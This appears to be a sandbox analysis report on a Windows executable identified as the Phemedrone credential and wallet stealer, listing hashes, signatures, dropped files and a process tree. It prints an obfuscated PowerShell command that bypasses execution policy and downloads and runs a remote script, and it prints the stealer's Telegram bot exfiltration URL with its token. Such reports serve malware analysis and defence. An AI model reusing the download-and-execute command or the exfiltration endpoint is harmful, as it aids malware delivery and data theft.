Overview

overview

10

Static

static

3

86e8265d6b...54.exe

windows7-x64

8

86e8265d6b...54.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    139s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-11-2024 08:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe

  • Size

    14.2MB

  • MD5

    c5d36c7404a03ec6df8024737d97a0c8

  • SHA1

    9a213e487337376c38e0cfdac240dc6ffb5fdc1e

  • SHA256

    86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354

  • SHA512

    812a21f479c56716d892df32a1f910b41310f74de13641d93654a0a722705fb90e114081f2af2ef8c4717febb05715183c0d6deb36bb135f819553c9a9e49216

  • SSDEEP

    196608:MUehdkSzJ4bvuLE5rUSW9rWWsPbWIBMWRlHbLVb4zH:M94x5r1CrWWsTWIfN8

Score
10/10
phemedroneexecutionstealer

Malware Config

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument

Signatures

  • Phemedrone

    An information and wallet stealer written in C#.

    stealerphemedrone
  • Phemedrone family
    phemedrone
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

    execution
  • Executes dropped EXE 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe
    "C:\Users\Admin\AppData\Local\Temp\86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:720
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4880
      • C:\Windows\system32\cmd.exe
        cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3308
        • C:\Windows\system32\cmd.exe
          cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4748
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5076
            • C:\Users\Admin\AppData\Roaming\WDSecureUtilities_333.exe
              "C:\Users\Admin\AppData\Roaming\WDSecureUtilities_333.exe" -pkek -aoa -y
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3008

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cr5ljjvv.ogd.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\WDSecureUtilities_333.exe
    Filesize

    246KB

    MD5

    bcb323eb0cfd10d58cf134bc7bdc8d67

    SHA1

    c34a8c428b715b67b696819fc1d172708a23d3f3

    SHA256

    6d1a5864d641f2da852bfced96a305a41b6464dc12a944883985a4c305a9d8c3

    SHA512

    bac5411c794a1b473b628c5b261bef5a830a6fed5a797c785ac3f3370def8f91db2368db8ea13d91ece0b89ab6109b64e3ecddcd27d15b2d7cc6f29216a57255

    Download Submit

  • memory/3008-27-0x0000014EC8F70000-0x0000014EC8FB4000-memory.dmp

    Filesize

    272KB

    Download

  • memory/5076-0-0x00007FFDBF0C3000-0x00007FFDBF0C5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/5076-1-0x00000226ED500000-0x00000226ED522000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5076-11-0x00007FFDBF0C0000-0x00007FFDBFB81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5076-12-0x00007FFDBF0C0000-0x00007FFDBFB81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5076-13-0x00007FFDBF0C0000-0x00007FFDBFB81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5076-14-0x00007FFDBF0C0000-0x00007FFDBFB81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5076-28-0x00007FFDBF0C0000-0x00007FFDBFB81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5076-29-0x00007FFDBF0C3000-0x00007FFDBF0C5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/5076-32-0x00007FFDBF0C0000-0x00007FFDBFB81000-memory.dmp

    Filesize

    10.8MB

    Download